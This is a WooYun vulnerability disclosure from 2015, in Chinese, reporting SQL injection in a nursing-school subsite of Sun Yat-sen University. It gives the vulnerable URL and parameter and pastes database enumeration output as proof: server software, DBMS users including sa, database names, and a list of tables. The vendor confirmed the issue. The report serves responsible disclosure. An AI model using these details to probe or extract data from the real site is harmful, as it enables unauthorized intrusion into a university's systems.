当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136854

漏洞标题:中山大学某子站存在sql注入漏洞

相关厂商:中山大学

漏洞作者: Anthea

提交时间:2015-08-25 16:21

修复时间:2015-10-09 17:26

公开时间:2015-10-09 17:26

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:3

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-25: 细节已通知厂商并且等待厂商处理中
2015-08-25: 厂商已经确认,细节仅向厂商公开
2015-09-04: 细节向核心白帽子及相关领域专家公开
2015-09-14: 细节向普通白帽子公开
2015-09-24: 细节向实习白帽子公开
2015-10-09: 细节向公众公开

简要描述:

详细说明:

注入参数为 no=168
nursing.sysu.edu.cn/main/news/NewsList.aspx?no=168&pId=116 该网页存在注入漏洞

漏洞证明:

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
database management system users [2]:
[*] dbadmin
[*] sa
available databases [6]:
[*] huli
[*] master
[*] model
[*] msdb
[*] nursing
[*] tempdb
Database: huli
[110 tables]
+-------------------+
| D99_CMD |
| D99_Tmp |
| GA01 |
| GA02 |
| GC01 |
| KA01 |
| KA02 |
| KA03 |
| KA04 |
| KA05 |
| MB01 |
| MB02 |
| MB03 |
| MB04 |
| MB05 |
| MB06 |
| MB07 |
| NA01 |
| NA02 |
| NA03 |
| NA04 |
| NA05 |
| RA01 |
| RA02 |
| RB01 |
| S01 |
| S02 |
| S03 |
| S04 |
| S05 |
| S06 |
| TA02 |
| VGA01_ |
| VGA01_ |
| VGA02_ |
| VGA02_ |
| VGC01_ |
| VGC01_ |
| VKA01_ |
| VKA01_ |
| VKA02_ |
| VKA02_ |
| VKA03_ |
| VKA03_ |
| VKA04_ |
| VKA04_ |
| VKA05_ |
| VKA05_ |
| VMB01_ |
| VMB01_ |
| VMB02_ |
| VMB02_ |
| VMB03_ |
| VMB03_ |
| VMB04_ |
| VMB04_ |
| VMB05_ |
| VMB05_ |
| VMB06_ |
| VMB06_ |
| VMB07_ |
| VMB07_ |
| VNA01_ |
| VNA01_ |
| VNA02_ |
| VNA02_ |
| VNA03_ |
| VNA03_ |
| VNA04_ |
| VNA04_ |
| VNA05_ |
| VNA05_ |
| VRA01_ |
| VRA01_ |
| VRA02_ |
| VRA02_ |
| VRB01_ |
| VRB01_ |
| VS01_ |
| VS01_ |
| VS02_ |
| VS02_ |
| VS03_ |
| VS03_ |
| VS04_ |
| VS04_ |
| VS05_ |
| VS05_ |
| VS06_ |
| VS06_ |
| VTA02_ |
| VTA02_ |
| V_GA01_1 |
| V_GC01_1 |
| V_MB02_99 |
| V_NA01_1 |
| V_NA02_1 |
| V_NA03_1 |
| V_NA04_2 |
| V_NA05_1 |
| v_admin_user_role |
| v_admin_user_role |
| v_all_user |
| v_gra1_user |
| v_gra2_user |
| v_n_user |
| v_na04_1 |
| v_rb01_1 |
| v_teach_user_role |
| v_teach_user_role |
+-------------------+

修复方案:

版权声明:转载请注明来源 Anthea@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-08-25 17:25

厂商回复:

谢谢提醒,我们马上处理。

最新状态:

暂无


漏洞评价:

评论